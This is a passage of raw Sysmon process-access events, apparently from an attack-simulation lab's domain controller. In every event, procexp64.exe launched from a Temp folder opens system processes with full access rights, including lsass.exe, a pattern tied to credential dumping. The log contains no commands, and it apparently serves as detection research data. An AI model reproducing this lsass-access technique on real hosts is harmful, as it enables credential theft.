Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785067Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:46.143{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1593-600B-AC00-00000000A301}4656C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785066Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:46.143{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1593-600B-A800-00000000A301}2616C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785065Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:46.143{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152F-600B-5900-00000000A301}3940C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785064Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:46.143{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152E-600B-5500-00000000A301}3732C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785063Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:46.143{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3500-00000000A301}3300C:\Windows\System32\vds.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785062Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:46.143{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3300-00000000A301}3092C:\Windows\system32\wbem\unsecapp.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785061Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:46.143{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3200-00000000A301}2008C:\Windows\system32\dfssvc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785060Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:46.143{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3100-00000000A301}2448C:\Windows\sysmon64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785059Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:46.143{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3000-00000000A301}2232C:\Windows\System32\ismserv.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785058Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:46.143{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2F00-00000000A301}2884C:\Windows\system32\dns.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785057Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:46.143{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2E00-00000000A301}2440C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785056Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:46.143{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2C00-00000000A301}2760C:\Windows\system32\DFSRs.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785055Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:46.143{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2B00-00000000A301}2704C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785054Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:46.143{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2A00-00000000A301}2740C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785053Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:46.143{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2900-00000000A301}2724C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785052Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:46.143{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2800-00000000A301}1980C:\Windows\System32\spoolsv.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785051Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:46.143{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1523-600B-2600-00000000A301}3012C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785050Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:46.143{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151F-600B-2400-00000000A301}2896C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785049Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:46.143{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151F-600B-2300-00000000A301}2888C:\Users\Public\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785048Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:46.143{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151B-600B-2100-00000000A301}2328C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785047Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:46.143{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1700-00000000A301}1636C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785046Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:46.143{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1600-00000000A301}1528C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785045Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:46.143{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1500-00000000A301}1480C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785044Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:46.143{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1400-00000000A301}1276C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785043Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:46.143{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1300-00000000A301}1200C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785042Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:46.143{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1200-00000000A301}1192C:\Windows\system32\dwm.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785041Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:46.143{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1100-00000000A301}1160C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785040Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:46.143{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1000-00000000A301}1152C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785039Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:46.143{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0F00-00000000A301}1120C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785038Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:46.143{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0E00-00000000A301}1076C:\Windows\system32\LogonUI.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785037Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:46.143{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0D00-00000000A301}624C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785036Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:46.143{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0C00-00000000A301}584C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785035Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:46.143{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785034Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:46.143{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0A00-00000000A301}848C:\Windows\system32\services.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785033Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:46.143{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785032Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:46.143{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0800-00000000A301}720C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785031Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:46.143{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0700-00000000A301}712C:\Windows\system32\wininit.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785030Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 